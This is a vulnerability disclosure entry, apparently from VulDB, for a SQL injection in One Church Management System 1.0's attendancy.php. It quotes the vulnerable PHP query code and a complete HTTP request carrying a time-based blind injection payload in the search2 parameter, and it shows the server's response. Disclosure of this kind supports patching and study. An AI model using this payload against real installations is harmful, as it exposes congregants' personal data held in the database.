Submit #32959: One Church Management System 1.0 - attendancy.php (search2) SQL Injectioninfo

TitleOne Church Management System 1.0 - attendancy.php (search2) SQL Injection
Description# Exploit Title: One Church Management System 1.0 - attendancy.php (search2) SQL Injection # Date: 18/03/2022 # Exploit Author: Mr Empy # Software Link: # Version: 1.0 # Tested on: Linux Title: ================ One Church Management System 1.0 - attendancy.php (search2) SQL Injection Summary: ================ The One Church Management System suffers from a Structured Query Language (SQL) injection vulnerability because of the lack of query preparation with the PDO module. This allows an attacker to query the database, breaking confidentiality and integrity. 88. if(isset($_POST['search2'])&& !empty($_POST['search2'])){ 89. $search2 = $_POST['search2']; 90. $sql="SELECT tblchristian.ID,tblchristian.Name,tblchristian.Sex,tblchristian.Age,tblchristian.Occupation,tblchristian.District,tblchristian.Village,tblchristian.Phone from tblchristian where Code = '$search2'"; 91. $query = $dbh -> prepare($sql); 92. $query->execute(); 93. $results=$query->fetchAll(PDO::FETCH_OBJ); 94. $cnt=1; Severity Level: ================ 9.1 (Critical) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N Affected Product: ================ One Church Management System v1.0 Steps to Reproduce: ================ 1. Open a request repeater (like Burp Suite) and send this request: POST /one_church/attendancy.php HTTP/1.1 Host: Content-Length: 102 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close search2=%27+and+%28select+*+from%28select%28sleep%2810%29%29%29Avx%29+and+%27abc%27+%3D+%27abc&search= In the search2 parameter I injected a SQL blind payload: ' and (select * from(select(sleep(10)))Avx) and 'abc' = 'abc Reponse: HTTP/1.1 302 Found Date: Fri, 18 Mar 2022 14:02:51 GMT Server: Apache/2.4.52 Set-Cookie: PHPSESSID=2fdb771gp041gnuphtglv608b1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 14927
Usermrempy (ID 24379)
Submission2022-03-18 15:06 (2 years ago)
Moderation2022-03-18 15:13 (7 minutes later)
VulDB Entry195442

Might our Artificial Intelligence support you?

Check our Alexa App!